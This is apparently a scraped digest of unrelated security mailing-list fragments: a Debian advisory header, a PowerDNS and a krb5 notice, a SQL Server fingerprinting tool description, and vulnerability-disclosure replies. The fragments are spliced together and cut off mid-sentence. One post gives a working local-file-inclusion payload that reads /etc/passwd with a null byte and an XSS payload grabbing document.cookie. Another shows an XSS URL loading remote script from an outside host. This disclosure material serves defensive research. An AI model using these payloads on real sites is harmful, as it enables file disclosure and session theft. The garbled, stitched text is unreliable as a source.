-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
-
Debian Security Advisory DSA-1965 secur...@debian.org
http://www.debian.org/security/ Giuseppe Iuculano
January 06, 2010
Hello,
Some of you may be interested in this short technical note which
includes some recent observations about TLS renegotiation and other
issues:
http://www.vsecurity.com/download/papers/HTTPDigestIntegrity.pdf
Comments welcome,
tim
Introduction
Recent history has proven that
One thing I forgot: a %00 must be included at the end of the LFI, i.e.:
index.php?op=../../../../../../../etc/passwd%00
And ?op is vulnerable to an XSS attack, i.e.:
index.php?op=alert(document.cookie)
Ignacio.
.:[Software Description:
This is a tool that performs version fingerprinting on Microsoft SQL Server
2000, 2005 and 2008, using well-known techniques based on several public tools
that identify the SQL version. The strength of this tool is that it uses
a probabilistic algorithm to identify the ver
Dear PowerDNS Users,
Two major vulnerabilities have recently been discovered in the PowerDNS
Recursor (all versions up to and including 3.1.7.1). Over the past two
weeks, these vulnerabilities have been addressed, resulting in PowerDNS
Recursor 3.1.7.2.
Given the nature and magnitude of these vul
Hi Berend-Jan
Please find the respective responses
> Repro steps:
> 1) Some websites do not sanitize user input correctly, such as the one
> in your example, which allows things like XSS:
> http://www.worksafenb.ca/redirect.asp?V=";'%20src=http://skypher.com/SkyLined/xss.js> http://www.worksafenb.c
===
Ubuntu Security Notice USN-879-1 January 06, 2010
krb5 vulnerability
CVE-2009-3295
===
A security issue affects the following Ubuntu releases:
Ubuntu 9.10
This advisory a
On Tue, Jan 05, 2010 at 10:49:07AM -0800, Michal Zalewski wrote:
> > Video: http://www.secniche.org/videos/google_chrome_link_inj.html
>
> You might find it informative to review the section of BSH on URL parsing:
> http://code.google.com/p/browsersec/wiki/Part1#Uniform_Resource_Locators
Also, a